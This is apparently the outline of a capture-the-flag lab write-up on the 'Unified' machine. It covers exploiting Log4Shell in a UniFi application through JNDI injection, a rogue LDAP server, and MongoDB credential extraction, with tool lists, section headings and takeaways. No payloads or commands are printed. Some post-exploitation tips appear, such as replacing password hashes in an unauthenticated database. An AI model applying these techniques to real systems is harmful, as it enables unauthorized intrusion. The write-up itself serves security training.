Unified provides hands-on experience with Log4Shell (CVE-2021-44228) — arguably the most impactful vulnerability of the 2020s. This zero-click RCE affected Log4j, the logging library used in an enormous number of Java applications. The target is a UniFi Network Application — an IT infrastructure management platform. The exploit chain runs through JNDI injection, a rogue LDAP server, and finishes with credential extraction from MongoDB to read the root flag.
Tools: nmap · burpsuite · rogue-jndi · netcat · mongosh · Difficulty: Easy · OS: Linux
01 — What You Will Learn
02 — Reconnaissance
03 — How Log4Shell Works
04 — Setting Up the Rogue LDAP Server
05 — Triggering the Exploit
06 — Post-Exploitation: MongoDB Credential Extraction
<
07 — Log4Shell Injection Points
08 — Key Takeaways
Log4Shell demonstrated that a single library vulnerability can compromise the global internet's infrastructure. Any string that reaches a Log4j logger is a potential attack vector — headers, cookies, usernames, form fields.
| Concept | Real-world relevance |
|---|---|
| JNDI lookup in logging | Any field that gets logged must be treated as an injection point in Log4j-based apps |
| Outbound LDAP from servers | Firewall egress rules blocking LDAP (port 389/636) from servers to internet mitigate Log4Shell |
| MongoDB on internal port | Local MongoDB (port 27017/27117) without auth is always worth probing after shell access |
| Hash replacement vs cracking | When you have DB write access, replacing the hash is faster and avoids the crack entirely |
⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing on any systems.